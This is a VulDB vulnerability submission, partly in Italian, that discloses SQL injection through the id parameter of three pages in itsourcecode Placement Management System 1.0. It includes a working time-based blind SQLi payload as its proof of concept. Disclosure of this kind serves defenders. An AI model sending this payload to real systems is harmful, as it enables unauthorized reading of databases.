Invia #383865: itsourcecode Placement Management System 1.0 SQLiinformazioni

Titoloitsourcecode Placement Management System 1.0 SQLi
DescrizioneIn the view_company.php, view_drive.php, and view_student.php pages, an id parameter can be passed to query data. However, due to inadequate filtering of the id parameter on these pages, SQL injection vulnerabilities are present. ——————————POC——————————— Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5490 FROM (SELECT(SLEEP(5)))qDPR) AND 'HyHB'='HyHB
Fonte⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-4.md
Utente
 Dee.Mirage (UID 71702)
Sottomissione31/07/2024 16:22 (2 anni fa)
Moderazione03/08/2024 08:49 (3 days later)
StatoAccettato
Voce VulDB273543 [itsourcecode Placement Management System 1.0 view_company.php ID iniezione SQL]
Punti20

PrecedenteVisione D'ensembleIl prossimo

Interested in the pricing of exploits?

See the underground prices here!